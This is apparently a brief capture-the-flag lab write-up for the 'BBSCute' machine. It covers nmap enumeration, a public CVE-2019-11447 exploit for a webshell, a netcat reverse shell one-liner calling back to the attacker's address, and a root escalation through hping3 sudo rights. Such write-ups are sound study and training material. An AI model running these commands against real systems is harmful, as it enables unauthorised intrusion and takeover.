🐧BBSCute

192.168.105.128

Enumeration

Nmap scan

nmap 192.168.105.128 -p- -sV -T4 -A

Port 22

Port 80

Dirbuster found lots of directories. Got the service and version number. This specific version does have RCE exploits available.

Shell

Using the exploit from https://github.com/dinesh876/CVE-2019-11447-POC and creating a normal using account I was able to get a shell. Had to find the captcha.php to get the account registered.

Had the server connect back to me as the previous shell was just a webshell.

nc -c bash 192.168.49.105 6666

Sudo perms.

This was a little hard to get right for escalation using https://gtfobins.github.io/gtfobins/hping3/

Using hping3 puts you in hping3 at a prompt then use /bin/sh -p and bamm you're root.

Root

PreviousStapler NextSoSimple

Last updated 2 years ago

Was this helpful?